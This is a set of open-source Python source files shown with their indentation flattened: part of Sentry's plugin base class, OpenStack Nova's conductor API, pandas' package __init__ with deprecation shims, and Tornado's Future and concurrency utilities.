enabled = True
can_disable = True
# Should this plugin be enabled by default for projects?
project_default_enabled = False
def _get_option_key(self, key):
return '%s:%s' % (self.get_conf_key(), key)
def is_enabled(self, project=None):
"""
Returns a boolean representing if this plugin is enabled.
If ``project`` is passed, it will limit the scope to that project.
>>> plugin.is_enabled()
"""
if not self.enabled:
return False
if not self.can_disable:
return True
if not self.can_enable_for_projects():
return True
if project:
project_enabled = self.get_option('enabled', project)
if project_enabled is not None:
return project_enabled
else:
return self.project_default_enabled
return True
def reset_options(self, project=None, user=None):
from sentry.plugins.helpers import reset_options
return reset_options(self.get_conf_key(), project, user)
def get_option(self, key, project=None, user=None):
"""
Returns the value of an option in your plugins keyspace, or ``None`` if
one is not present.
If ``project`` is passed, it will limit the scope to that project's keyspace.
>>> value = plugin.get_option('my_option')
"""
from sentry.plugins.helpers import get_option
return get_option(self._get_option_key(key), project, user)
def set_option(self, key, value, project=None, user=None):
"""
Updates the value of an option in your plugins keyspace.
If ``project`` is passed, it will limit the scope to that project's keyspace.
>>> plugin.set_option('my_option', 'http://example.com')
"""
from sentry.plugins.helpers import set_option
return set_option(self._get_option_key(key), value, project, user)
def unset_option(self, key, project=None, user=None):
"""
Removes an option in your plugins keyspace.
If ``project`` is passed, it will limit the scope to that project's keyspace.
>>> plugin.unset_option('my_option')
"""
from sentry.plugins.helpers import unset_option
return unset_option(self._get_option_key(key), project, user)
def get_url(self, group):
"""
Returns the absolute URL to this plugins group action handler.
>>> plugin.get_url(group)
"""
return reverse('sentry-group-plugin-action', args=(group.organization.slug, group.project.slug, group.pk, self.slug))
def get_conf_key(self):
"""
Returns a string representing the configuration keyspace prefix for this plugin.
"""
if not self.conf_key:
return self.get_conf_title().lower().replace(' ', '_')
return self.conf_key
def get_conf_title(self):
"""
Returns a string representing the title to be shown on the configuration page.
"""
return self.conf_title or self.get_title()
def has_site_conf(self):
return self.site_conf_form is not None
def has_project_conf(self):
return self.project_conf_form is not None
def can_enable_for_projects(self):
"""
Returns a boolean describing whether this plugin can be enabled on a per project basis
"""
return True
def get_form_initial(self, project=None):
return {}
# Response methods
def redirect(self, url):
"""
Returns a redirect response type.
"""
return HttpResponseRedirect(url)
def render(self, template, context=None):
"""
Given a template name, and an optional context (dictionary), returns a
ready-to-render response.
Default context includes the plugin instance.
>>> plugin.render('template.html', {'hello': 'world'})
"""
if context is None:
context = {}
context['plugin'] = self
return Response(template, context)
# The following methods are specific to web requests
def get_title(self):
"""
Returns the general title for this plugin.
>>> plugin.get_title()
"""
return self.title
def get_description(self):
"""
Returns the description for this plugin. This is shown on the plugin configuration
page.
>>> plugin.get_description()
"""
return self.description
def get_resource_links(self):
"""
Returns a list of tuples pointing to various resources for this plugin.
>>> def get_resource_links(self):
>>> return [
>>> ('Documentation', 'http://sentry.readthedocs.org'),
>>> ('Bug Tracker', 'https://github.com/getsentry/sentry/issues'),
>>> ('Source', 'https://github.com/getsentry/sentry'),
>>> ]
"""
return self.resource_links
def get_view_response(self, request, group):
from sentry.models import Event
from sentry.permissions import can_admin_group, can_remove_group
self.selected = request.path == self.get_url(group)
if not self.selected:
return
response = self.view(request, group)
if not response:
return
if isinstance(response, HttpResponseRedirect):
return response
if not isinstance(response, Response):
raise NotImplementedError('Use self.render() when returning responses.')
event = group.get_latest_event() or Event()
event.group = group
return response.respond(request, {
'plugin': self,
'project': group.project,
'group': group,
'event': event,
'can_admin_event': can_admin_group(request.user, group),
'can_remove_event': can_remove_group(request.user, group),
})
def view(self, request, group, **kwargs):
"""
Handles the view logic. If no response is given, we continue to the next action provider.
>>> def view(self, request, group, **kwargs):
>>> return self.render('myplugin/about.html')
"""
def before_events(self, request, group_list, **kwargs):
"""
Allows preprocessing of groups in the list view.
This is generally useful if you need to cache lookups
for something like ``tags`` which would otherwise do
multiple queries.
If you use this **at all** you should ensure it's already
reset on each execution.
As an example, here's how we might get a reference to ticket ids we were
storing per event, in an efficient O(1) manner.
>>> def before_events(self, request, event_list, **kwargs):
>>> prefix = self.get_conf_key()
>>> GroupMeta.objects.get_value_bulk(event_list, '%s:tid' % prefix)
"""
def tags(self, request, group, tag_list, **kwargs):
"""
Modifies the tag list for a grouped message.
A tag is a string, already marked safe or later escaped, that is shown inline with
the event.
This must return ``tag_list``.
>>> def tags(self, request, group, tag_list, **kwargs):
>>> tag_list.append(':(')
>>> return tag_list
"""
return tag_list
def actions(self, request, group, action_list, **kwargs):
"""
Modifies the action list for a grouped message.
An action is a tuple containing two elements:
('Action Label', '/uri/to/action/')
This must return ``action_list``.
>>> def actions(self, request, group, action_list, **kwargs):
>>> action_list.append(('Google', 'http://google.com'))
>>> return action_list
"""
return action_list
def panels(self, request, group, panel_list, **kwargs):
"""
Modifies the panel list for a grouped message.
A panel is a tuple containing two elements:
('Panel Label', '/uri/to/panel/')
This must return ``panel_list``.
>>> def panels(self, request, group, action_list, **kwargs):
>>> panel_list.append((self.get_title(), self.get_url(group)))
>>> return panel_list
"""
return panel_list
def widget(self, request, group, **kwargs):
"""
Renders as a widget in the group details sidebar.
>>> def widget(self, request, group, **kwargs):
>>> return self.render('myplugin/widget.html')
"""
# Server side signals which do not have request context
def has_perm(self, user, perm, *objects, **kwargs):
"""
Given a user, a permission name, and an optional list of objects
within context, returns an override value for a permission.
:param user: either an instance of ``AnonymousUser`` or ``User``.
:param perm: a string, such as "edit_project"
:param objects: an optional list of objects
If your plugin does not modify this permission, simply return ``None``.
For example, has perm might be called like so:
>>> has_perm(user, 'add_project')
It also might be called with more context:
>>> has_perm(user, 'edit_project', project)
Or with even more context:
>>> has_perm(user, 'configure_project_plugin', project, plugin)
"""
return None
def missing_perm_response(self, request, perm, *args, **objects):
"""
Given a user, a permission name, and an optional mapping of objects
within a context, returns a custom response.
:param user: either an instance of ``AnonymousUser`` or ``User``.
:param perm: a string, such as "edit_project"
:param objects: an optional mapping of objects
If your plugin does not need to override this response, simply return
``None``.
"""
def on_alert(self, alert, **kwargs):
"""
Called when a new alert is generated.
:param alert: an instance of ``Alert``
>>> def on_alert(self, alert, **kwargs):
>>> print 'New alert!', alert.message
>>> print alert.get_absolute_url()
"""
def is_regression(self, group, event, **kwargs):
"""
Called on new events when the group's status is resolved.
Return True if this event is a regression, False if it is not,
None to defer to other plugins.
:param group: an instance of ``Group``
:param event: an instance of ``Event``
>>> def is_regression(self, group, event, **kwargs):
>>> # regression if 'version' tag has a value we haven't seen before
>>> seen_versions = set(t[0] for t in group.get_unique_tags("version"))
>>> event_version = dict(event.get_tags()).get("version")
>>> return event_version not in seen_versions
"""
def post_process(self, group, event, is_new, is_sample, **kwargs):
"""
Post processes an event after it has been saved.
:param group: an instance of ``Group``
:param event: an instance of ``Event``
:param is_new: a boolean describing if this group is new, or has changed state
:param is_sample: a boolean describing if this event was stored, or sampled
>>> def post_process(self, event, **kwargs):
>>> print 'New event created:', event.id
>>> print group.get_absolute_url()
"""
def get_tags(self, event, **kwargs):
"""
Return additional tags to add to this instance.
Tags should be a list of tuples.
>>> def get_tags(self, event, **kwargs):
>>> return [('tag-name', 'tag-value')]
"""
def get_notification_forms(self, **kwargs):
"""
Provides additional UserOption forms for the Notification Settings page.
Must return an iterable.
>>> def get_notification_forms(self, **kwargs):
>>> return [MySettingsForm]
"""
return []
def is_testable(self, **kwargs):
"""
Returns True if this plugin is able to be tested.
"""
return hasattr(self, 'test_configuration')
class Plugin(IPlugin):
"""
A plugin should be treated as if it were a singleton. The owner does not
control when or how the plugin gets instantiated, nor is it guaranteed that
it will happen, or happen more than once.
"""
__version__ = 1
__metaclass__ = PluginMount
| |
# Copyright 2012 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Handles all requests to the conductor service."""
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging as messaging
from nova import baserpc
from nova.conductor import manager
from nova.conductor import rpcapi
from nova.i18n import _LI, _LW
from nova import utils
conductor_opts = [
cfg.BoolOpt('use_local',
default=False,
help='Perform nova-conductor operations locally'),
cfg.StrOpt('topic',
default='conductor',
help='The topic on which conductor nodes listen'),
cfg.StrOpt('manager',
default='nova.conductor.manager.ConductorManager',
help='Full class name for the Manager for conductor'),
cfg.IntOpt('workers',
help='Number of workers for OpenStack Conductor service. '
'The default will be the number of CPUs available.')
]
conductor_group = cfg.OptGroup(name='conductor',
title='Conductor Options')
CONF = cfg.CONF
CONF.register_group(conductor_group)
CONF.register_opts(conductor_opts, conductor_group)
LOG = logging.getLogger(__name__)
class LocalAPI(object):
"""A local version of the conductor API that does database updates
locally instead of via RPC.
"""
def __init__(self):
# TODO(danms): This needs to be something more generic for
# other/future users of this sort of functionality.
self._manager = utils.ExceptionHelper(manager.ConductorManager())
def wait_until_ready(self, context, *args, **kwargs):
# nothing to wait for in the local case.
pass
def instance_update(self, context, instance_uuid, **updates):
"""Perform an instance update in the database."""
return self._manager.instance_update(context, instance_uuid,
updates, 'compute')
def provider_fw_rule_get_all(self, context):
return self._manager.provider_fw_rule_get_all(context)
def vol_usage_update(self, context, vol_id, rd_req, rd_bytes, wr_req,
wr_bytes, instance, last_refreshed=None,
update_totals=False):
return self._manager.vol_usage_update(context, vol_id,
rd_req, rd_bytes,
wr_req, wr_bytes,
instance, last_refreshed,
update_totals)
def compute_node_create(self, context, values):
return self._manager.compute_node_create(context, values)
def security_groups_trigger_members_refresh(self, context, group_ids):
return self._manager.security_groups_trigger_members_refresh(context,
group_ids)
def object_backport(self, context, objinst, target_version):
return self._manager.object_backport(context, objinst, target_version)
class LocalComputeTaskAPI(object):
def __init__(self):
# TODO(danms): This needs to be something more generic for
# other/future users of this sort of functionality.
self._manager = utils.ExceptionHelper(
manager.ComputeTaskManager())
def resize_instance(self, context, instance, extra_instance_updates,
scheduler_hint, flavor, reservations,
clean_shutdown=True):
# NOTE(comstud): 'extra_instance_updates' is not used here but is
# needed for compatibility with the cells_rpcapi version of this
# method.
self._manager.migrate_server(
context, instance, scheduler_hint, live=False, rebuild=False,
flavor=flavor, block_migration=None, disk_over_commit=None,
reservations=reservations, clean_shutdown=clean_shutdown)
def live_migrate_instance(self, context, instance, host_name,
block_migration, disk_over_commit):
scheduler_hint = {'host': host_name}
self._manager.migrate_server(
context, instance, scheduler_hint, True, False, None,
block_migration, disk_over_commit, None)
def build_instances(self, context, instances, image,
filter_properties, admin_password, injected_files,
requested_networks, security_groups, block_device_mapping,
legacy_bdm=True):
utils.spawn_n(self._manager.build_instances, context,
instances=instances, image=image,
filter_properties=filter_properties,
admin_password=admin_password, injected_files=injected_files,
requested_networks=requested_networks,
security_groups=security_groups,
block_device_mapping=block_device_mapping,
legacy_bdm=legacy_bdm)
def unshelve_instance(self, context, instance):
utils.spawn_n(self._manager.unshelve_instance, context,
instance=instance)
def rebuild_instance(self, context, instance, orig_image_ref, image_ref,
injected_files, new_pass, orig_sys_metadata,
bdms, recreate=False, on_shared_storage=False,
preserve_ephemeral=False, host=None, kwargs=None):
# kwargs unused but required for cell compatibility.
utils.spawn_n(self._manager.rebuild_instance, context,
instance=instance,
new_pass=new_pass,
injected_files=injected_files,
image_ref=image_ref,
orig_image_ref=orig_image_ref,
orig_sys_metadata=orig_sys_metadata,
bdms=bdms,
recreate=recreate,
on_shared_storage=on_shared_storage,
host=host,
preserve_ephemeral=preserve_ephemeral)
class API(LocalAPI):
"""Conductor API that does updates via RPC to the ConductorManager."""
def __init__(self):
self._manager = rpcapi.ConductorAPI()
self.base_rpcapi = baserpc.BaseAPI(topic=CONF.conductor.topic)
def wait_until_ready(self, context, early_timeout=10, early_attempts=10):
'''Wait until a conductor service is up and running.
This method calls the remote ping() method on the conductor topic until
it gets a response. It starts with a shorter timeout in the loop
(early_timeout) up to early_attempts number of tries. It then drops
back to the globally configured timeout for rpc calls for each retry.
'''
attempt = 0
timeout = early_timeout
# if we show the timeout message, make sure we show a similar
# message saying that everything is now working to avoid
# confusion
has_timedout = False
while True:
# NOTE(danms): Try ten times with a short timeout, and then punt
# to the configured RPC timeout after that
if attempt == early_attempts:
timeout = None
attempt += 1
# NOTE(russellb): This is running during service startup. If we
# allow an exception to be raised, the service will shut down.
# This may fail the first time around if nova-conductor wasn't
# running when this service started.
try:
self.base_rpcapi.ping(context, '1.21 GigaWatts',
timeout=timeout)
if has_timedout:
LOG.info(_LI('nova-conductor connection '
'established successfully'))
break
except messaging.MessagingTimeout:
has_timedout = True
LOG.warning(_LW('Timed out waiting for nova-conductor. '
'Is it running? Or did this service start '
'before nova-conductor? '
'Reattempting establishment of '
'nova-conductor connection...'))
def instance_update(self, context, instance_uuid, **updates):
"""Perform an instance update in the database."""
return self._manager.instance_update(context, instance_uuid,
updates, 'conductor')
class ComputeTaskAPI(object):
"""ComputeTask API that queues up compute tasks for nova-conductor."""
def __init__(self):
self.conductor_compute_rpcapi = rpcapi.ComputeTaskAPI()
def resize_instance(self, context, instance, extra_instance_updates,
scheduler_hint, flavor, reservations,
clean_shutdown=True):
# NOTE(comstud): 'extra_instance_updates' is not used here but is
# needed for compatibility with the cells_rpcapi version of this
# method.
self.conductor_compute_rpcapi.migrate_server(
context, instance, scheduler_hint, live=False, rebuild=False,
flavor=flavor, block_migration=None, disk_over_commit=None,
reservations=reservations, clean_shutdown=clean_shutdown)
def live_migrate_instance(self, context, instance, host_name,
block_migration, disk_over_commit):
scheduler_hint = {'host': host_name}
self.conductor_compute_rpcapi.migrate_server(
context, instance, scheduler_hint, True, False, None,
block_migration, disk_over_commit, None)
def build_instances(self, context, instances, image, filter_properties,
admin_password, injected_files, requested_networks,
security_groups, block_device_mapping, legacy_bdm=True):
self.conductor_compute_rpcapi.build_instances(context,
instances=instances, image=image,
filter_properties=filter_properties,
admin_password=admin_password, injected_files=injected_files,
requested_networks=requested_networks,
security_groups=security_groups,
block_device_mapping=block_device_mapping,
legacy_bdm=legacy_bdm)
def unshelve_instance(self, context, instance):
self.conductor_compute_rpcapi.unshelve_instance(context,
instance=instance)
def rebuild_instance(self, context, instance, orig_image_ref, image_ref,
injected_files, new_pass, orig_sys_metadata,
bdms, recreate=False, on_shared_storage=False,
preserve_ephemeral=False, host=None, kwargs=None):
# kwargs unused but required for cell compatibility
self.conductor_compute_rpcapi.rebuild_instance(context,
instance=instance,
new_pass=new_pass,
injected_files=injected_files,
image_ref=image_ref,
orig_image_ref=orig_image_ref,
orig_sys_metadata=orig_sys_metadata,
bdms=bdms,
recreate=recreate,
on_shared_storage=on_shared_storage,
preserve_ephemeral=preserve_ephemeral,
host=host)
| |
# flake8: noqa
__docformat__ = "restructuredtext"
# Let users know if they're missing any of our hard dependencies
hard_dependencies = ("numpy", "pytz", "dateutil")
missing_dependencies = []
for dependency in hard_dependencies:
try:
__import__(dependency)
except ImportError as e:
missing_dependencies.append(f"{dependency}: {e}")
if missing_dependencies:
raise ImportError(
"Unable to import required dependencies:\n" + "\n".join(missing_dependencies)
)
del hard_dependencies, dependency, missing_dependencies
# numpy compat
from pandas.compat.numpy import (
_np_version_under1p16,
_np_version_under1p17,
_np_version_under1p18,
_is_numpy_dev,
)
try:
from pandas._libs import hashtable as _hashtable, lib as _lib, tslib as _tslib
except ImportError as e: # pragma: no cover
# hack but overkill to use re
module = str(e).replace("cannot import name ", "")
raise ImportError(
f"C extension: {module} not built. If you want to import "
"pandas from the source directory, you may need to run "
"'python setup.py build_ext --inplace --force' to build the C extensions first."
) from e
from pandas._config import (
get_option,
set_option,
reset_option,
describe_option,
option_context,
options,
)
# let init-time option registration happen
import pandas.core.config_init
from pandas.core.api import (
# dtype
Int8Dtype,
Int16Dtype,
Int32Dtype,
Int64Dtype,
UInt8Dtype,
UInt16Dtype,
UInt32Dtype,
UInt64Dtype,
CategoricalDtype,
PeriodDtype,
IntervalDtype,
DatetimeTZDtype,
StringDtype,
BooleanDtype,
# missing
NA,
isna,
isnull,
notna,
notnull,
# indexes
Index,
CategoricalIndex,
Int64Index,
UInt64Index,
RangeIndex,
Float64Index,
MultiIndex,
IntervalIndex,
TimedeltaIndex,
DatetimeIndex,
PeriodIndex,
IndexSlice,
# tseries
NaT,
Period,
period_range,
Timedelta,
timedelta_range,
Timestamp,
date_range,
bdate_range,
Interval,
interval_range,
DateOffset,
# conversion
to_numeric,
to_datetime,
to_timedelta,
# misc
Grouper,
factorize,
unique,
value_counts,
NamedAgg,
array,
Categorical,
set_eng_float_format,
Series,
DataFrame,
)
from pandas.core.arrays.sparse import SparseDtype
from pandas.tseries.api import infer_freq
from pandas.tseries import offsets
from pandas.core.computation.api import eval
from pandas.core.reshape.api import (
concat,
lreshape,
melt,
wide_to_long,
merge,
merge_asof,
merge_ordered,
crosstab,
pivot,
pivot_table,
get_dummies,
cut,
qcut,
)
import pandas.api
from pandas.util._print_versions import show_versions
from pandas.io.api import (
# excel
ExcelFile,
ExcelWriter,
read_excel,
# parsers
read_csv,
read_fwf,
read_table,
# pickle
read_pickle,
to_pickle,
# pytables
HDFStore,
read_hdf,
# sql
read_sql,
read_sql_query,
read_sql_table,
# misc
read_clipboard,
read_parquet,
read_orc,
read_feather,
read_gbq,
read_html,
read_json,
read_stata,
read_sas,
read_spss,
)
from pandas.io.json import _json_normalize as json_normalize
from pandas.util._tester import test
import pandas.testing
import pandas.arrays
# use the closest tagged version if possible
from ._version import get_versions
v = get_versions()
__version__ = v.get("closest-tag", v["version"])
__git_version__ = v.get("full-revisionid")
del get_versions, v
# GH 27101
# TODO: remove Panel compat in 1.0
if pandas.compat.PY37:
def __getattr__(name):
import warnings
if name == "Panel":
warnings.warn(
"The Panel class is removed from pandas. Accessing it "
"from the top-level namespace will also be removed in the next version",
FutureWarning,
stacklevel=2,
)
class Panel:
pass
return Panel
elif name == "datetime":
warnings.warn(
"The pandas.datetime class is deprecated "
"and will be removed from pandas in a future version. "
"Import from datetime module instead.",
FutureWarning,
stacklevel=2,
)
from datetime import datetime as dt
return dt
elif name == "np":
warnings.warn(
"The pandas.np module is deprecated "
"and will be removed from pandas in a future version. "
"Import numpy directly instead",
FutureWarning,
stacklevel=2,
)
import numpy as np
return np
elif name in {"SparseSeries", "SparseDataFrame"}:
warnings.warn(
f"The {name} class is removed from pandas. Accessing it from "
"the top-level namespace will also be removed in the next version",
FutureWarning,
stacklevel=2,
)
return type(name, (), {})
elif name == "SparseArray":
warnings.warn(
"The pandas.SparseArray class is deprecated "
"and will be removed from pandas in a future version. "
"Use pandas.arrays.SparseArray instead.",
FutureWarning,
stacklevel=2,
)
from pandas.core.arrays.sparse import SparseArray as _SparseArray
return _SparseArray
raise AttributeError(f"module 'pandas' has no attribute '{name}'")
else:
class Panel:
pass
class SparseDataFrame:
pass
class SparseSeries:
pass
class __numpy:
def __init__(self):
import numpy as np
import warnings
self.np = np
self.warnings = warnings
def __getattr__(self, item):
self.warnings.warn(
"The pandas.np module is deprecated "
"and will be removed from pandas in a future version. "
"Import numpy directly instead",
FutureWarning,
stacklevel=2,
)
try:
return getattr(self.np, item)
except AttributeError as err:
raise AttributeError(f"module numpy has no attribute {item}") from err
np = __numpy()
class __Datetime(type):
from datetime import datetime as dt
datetime = dt
def __getattr__(cls, item):
cls.emit_warning()
try:
return getattr(cls.datetime, item)
except AttributeError as err:
raise AttributeError(
f"module datetime has no attribute {item}"
) from err
def __instancecheck__(cls, other):
return isinstance(other, cls.datetime)
class __DatetimeSub(metaclass=__Datetime):
def emit_warning(dummy=0):
import warnings
warnings.warn(
"The pandas.datetime class is deprecated "
"and will be removed from pandas in a future version. "
"Import from datetime instead.",
FutureWarning,
stacklevel=3,
)
def __new__(cls, *args, **kwargs):
cls.emit_warning()
from datetime import datetime as dt
return dt(*args, **kwargs)
datetime = __DatetimeSub
class __SparseArray(type):
from pandas.core.arrays.sparse import SparseArray as sa
SparseArray = sa
def __instancecheck__(cls, other):
return isinstance(other, cls.SparseArray)
class __SparseArraySub(metaclass=__SparseArray):
def emit_warning(dummy=0):
import warnings
warnings.warn(
"The pandas.SparseArray class is deprecated "
"and will be removed from pandas in a future version. "
"Use pandas.arrays.SparseArray instead.",
FutureWarning,
stacklevel=3,
)
def __new__(cls, *args, **kwargs):
cls.emit_warning()
from pandas.core.arrays.sparse import SparseArray as sa
return sa(*args, **kwargs)
SparseArray = __SparseArraySub
# module level doc-string
__doc__ = """
pandas - a powerful data analysis and manipulation library for Python
=====================================================================
**pandas** is a Python package providing fast, flexible, and expressive data
structures designed to make working with "relational" or "labeled" data both
easy and intuitive. It aims to be the fundamental high-level building block for
doing practical, **real world** data analysis in Python. Additionally, it has
the broader goal of becoming **the most powerful and flexible open source data
analysis / manipulation tool available in any language**. It is already well on
its way toward this goal.
Main Features
-------------
Here are just a few of the things that pandas does well:
- Easy handling of missing data in floating point as well as non-floating
point data.
- Size mutability: columns can be inserted and deleted from DataFrame and
higher dimensional objects
- Automatic and explicit data alignment: objects can be explicitly aligned
to a set of labels, or the user can simply ignore the labels and let
`Series`, `DataFrame`, etc. automatically align the data for you in
computations.
- Powerful, flexible group by functionality to perform split-apply-combine
operations on data sets, for both aggregating and transforming data.
- Make it easy to convert ragged, differently-indexed data in other Python
and NumPy data structures into DataFrame objects.
- Intelligent label-based slicing, fancy indexing, and subsetting of large
data sets.
- Intuitive merging and joining data sets.
- Flexible reshaping and pivoting of data sets.
- Hierarchical labeling of axes (possible to have multiple labels per tick).
- Robust IO tools for loading data from flat files (CSV and delimited),
Excel files, databases, and saving/loading data from the ultrafast HDF5
format.
- Time series-specific functionality: date range generation and frequency
conversion, moving window statistics, date shifting and lagging.
"""
| |
#!/usr/bin/env python
#
# Copyright 2012 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Utilities for working with threads and ``Futures``.
``Futures`` are a pattern for concurrent programming introduced in
Python 3.2 in the `concurrent.futures` package (this package has also
been backported to older versions of Python and can be installed with
``pip install futures``). Tornado will use `concurrent.futures.Future` if
it is available; otherwise it will use a compatible class defined in this
module.
"""
from __future__ import absolute_import, division, print_function, with_statement
import functools
import platform
import textwrap
import traceback
import sys
from tornado.log import app_log
from tornado.stack_context import ExceptionStackContext, wrap
from tornado.util import raise_exc_info, ArgReplacer
try:
from concurrent import futures
except ImportError:
futures = None
# Can the garbage collector handle cycles that include __del__ methods?
# This is true in cpython beginning with version 3.4 (PEP 442).
_GC_CYCLE_FINALIZERS = (platform.python_implementation() == 'CPython' and
sys.version_info >= (3, 4))
class ReturnValueIgnoredError(Exception):
pass
# This class and associated code in the future object is derived
# from the Trollius project, a backport of asyncio to Python 2.x - 3.x
class _TracebackLogger(object):
"""Helper to log a traceback upon destruction if not cleared.
This solves a nasty problem with Futures and Tasks that have an
exception set: if nobody asks for the exception, the exception is
never logged. This violates the Zen of Python: 'Errors should
never pass silently. Unless explicitly silenced.'
However, we don't want to log the exception as soon as
set_exception() is called: if the calling code is written
properly, it will get the exception and handle it properly. But
we *do* want to log it if result() or exception() was never called
-- otherwise developers waste a lot of time wondering why their
buggy code fails silently.
An earlier attempt added a __del__() method to the Future class
itself, but this backfired because the presence of __del__()
prevents garbage collection from breaking cycles. A way out of
this catch-22 is to avoid having a __del__() method on the Future
class itself, but instead to have a reference to a helper object
with a __del__() method that logs the traceback, where we ensure
that the helper object doesn't participate in cycles, and only the
Future has a reference to it.
The helper object is added when set_exception() is called. When
the Future is collected, and the helper is present, the helper
object is also collected, and its __del__() method will log the
traceback. When the Future's result() or exception() method is
called (and a helper object is present), it removes the the helper
object, after calling its clear() method to prevent it from
logging.
One downside is that we do a fair amount of work to extract the
traceback from the exception, even when it is never logged. It
would seem cheaper to just store the exception object, but that
references the traceback, which references stack frames, which may
reference the Future, which references the _TracebackLogger, and
then the _TracebackLogger would be included in a cycle, which is
what we're trying to avoid! As an optimization, we don't
immediately format the exception; we only do the work when
activate() is called, which call is delayed until after all the
Future's callbacks have run. Since usually a Future has at least
one callback (typically set by 'yield From') and usually that
callback extracts the callback, thereby removing the need to
format the exception.
PS. I don't claim credit for this solution. I first heard of it
in a discussion about closing files when they are collected.
"""
__slots__ = ('exc_info', 'formatted_tb')
def __init__(self, exc_info):
self.exc_info = exc_info
self.formatted_tb = None
def activate(self):
exc_info = self.exc_info
if exc_info is not None:
self.exc_info = None
self.formatted_tb = traceback.format_exception(*exc_info)
def clear(self):
self.exc_info = None
self.formatted_tb = None
def __del__(self):
if self.formatted_tb:
app_log.error('Future exception was never retrieved: %s',
''.join(self.formatted_tb).rstrip())
class Future(object):
"""Placeholder for an asynchronous result.
A ``Future`` encapsulates the result of an asynchronous
operation. In synchronous applications ``Futures`` are used
to wait for the result from a thread or process pool; in
Tornado they are normally used with `.IOLoop.add_future` or by
yielding them in a `.gen.coroutine`.
`tornado.concurrent.Future` is similar to
`concurrent.futures.Future`, but not thread-safe (and therefore
faster for use with single-threaded event loops).
In addition to ``exception`` and ``set_exception``, methods ``exc_info``
and ``set_exc_info`` are supported to capture tracebacks in Python 2.
The traceback is automatically available in Python 3, but in the
Python 2 futures backport this information is discarded.
This functionality was previously available in a separate class
``TracebackFuture``, which is now a deprecated alias for this class.
.. versionchanged:: 4.0
`tornado.concurrent.Future` is always a thread-unsafe ``Future``
with support for the ``exc_info`` methods. Previously it would
be an alias for the thread-safe `concurrent.futures.Future`
if that package was available and fall back to the thread-unsafe
implementation if it was not.
.. versionchanged:: 4.1
If a `.Future` contains an error but that error is never observed
(by calling ``result()``, ``exception()``, or ``exc_info()``),
a stack trace will be logged when the `.Future` is garbage collected.
This normally indicates an error in the application, but in cases
where it results in undesired logging it may be necessary to
suppress the logging by ensuring that the exception is observed:
``f.add_done_callback(lambda f: f.exception())``.
"""
def __init__(self):
self._done = False
self._result = None
self._exc_info = None
self._log_traceback = False # Used for Python >= 3.4
self._tb_logger = None # Used for Python <= 3.3
self._callbacks = []
# Implement the Python 3.5 Awaitable protocol if possible
# (we can't use return and yield together until py33).
if sys.version_info >= (3, 3):
exec(textwrap.dedent("""
def __await__(self):
return (yield self)
"""))
def cancel(self):
"""Cancel the operation, if possible.
Tornado ``Futures`` do not support cancellation, so this method always
returns False.
"""
return False
def cancelled(self):
"""Returns True if the operation has been cancelled.
Tornado ``Futures`` do not support cancellation, so this method
always returns False.
"""
return False
def running(self):
"""Returns True if this operation is currently running."""
return not self._done
def done(self):
"""Returns True if the future has finished running."""
return self._done
def _clear_tb_log(self):
self._log_traceback = False
if self._tb_logger is not None:
self._tb_logger.clear()
self._tb_logger = None
def result(self, timeout=None):
"""If the operation succeeded, return its result. If it failed,
re-raise its exception.
This method takes a ``timeout`` argument for compatibility with
`concurrent.futures.Future` but it is an error to call it
before the `Future` is done, so the ``timeout`` is never used.
"""
self._clear_tb_log()
if self._result is not None:
return self._result
if self._exc_info is not None:
raise_exc_info(self._exc_info)
self._check_done()
return self._result
def exception(self, timeout=None):
"""If the operation raised an exception, return the `Exception`
object. Otherwise returns None.
This method takes a ``timeout`` argument for compatibility with
`concurrent.futures.Future` but it is an error to call it
before the `Future` is done, so the ``timeout`` is never used.
"""
self._clear_tb_log()
if self._exc_info is not None:
return self._exc_info[1]
else:
self._check_done()
return None
def add_done_callback(self, fn):
"""Attaches the given callback to the `Future`.
It will be invoked with the `Future` as its argument when the Future
has finished running and its result is available. In Tornado
consider using `.IOLoop.add_future` instead of calling
`add_done_callback` directly.
"""
if self._done:
fn(self)
else:
self._callbacks.append(fn)
def set_result(self, result):
"""Sets the result of a ``Future``.
It is undefined to call any of the ``set`` methods more than once
on the same object.
"""
self._result = result
self._set_done()
def set_exception(self, exception):
"""Sets the exception of a ``Future.``"""
self.set_exc_info(
(exception.__class__,
exception,
getattr(exception, '__traceback__', None)))
def exc_info(self):
"""Returns a tuple in the same format as `sys.exc_info` or None.
.. versionadded:: 4.0
"""
self._clear_tb_log()
return self._exc_info
def set_exc_info(self, exc_info):
"""Sets the exception information of a ``Future.``
Preserves tracebacks on Python 2.
.. versionadded:: 4.0
"""
self._exc_info = exc_info
self._log_traceback = True
if not _GC_CYCLE_FINALIZERS:
self._tb_logger = _TracebackLogger(exc_info)
try:
self._set_done()
finally:
# Activate the logger after all callbacks have had a
# chance to call result() or exception().
if self._log_traceback and self._tb_logger is not None:
self._tb_logger.activate()
self._exc_info = exc_info
def _check_done(self):
if not self._done:
raise Exception("DummyFuture does not support blocking for results")
def _set_done(self):
self._done = True
for cb in self._callbacks:
try:
cb(self)
except Exception:
app_log.exception('Exception in callback %r for %r',
cb, self)
self._callbacks = None
# On Python 3.3 or older, objects with a destructor part of a reference
# cycle are never destroyed. It's no longer the case on Python 3.4 thanks to
# the PEP 442.
if _GC_CYCLE_FINALIZERS:
def __del__(self):
if not self._log_traceback:
# set_exception() was not called, or result() or exception()
# has consumed the exception
return
tb = traceback.format_exception(*self._exc_info)
app_log.error('Future %r exception was never retrieved: %s',
self, ''.join(tb).rstrip())
TracebackFuture = Future
if futures is None:
FUTURES = Future
else:
FUTURES = (futures.Future, Future)
def is_future(x):
return isinstance(x, FUTURES)
class DummyExecutor(object):
def submit(self, fn, *args, **kwargs):
future = TracebackFuture()
try:
future.set_result(fn(*args, **kwargs))
except Exception:
future.set_exc_info(sys.exc_info())
return future
def shutdown(self, wait=True):
pass
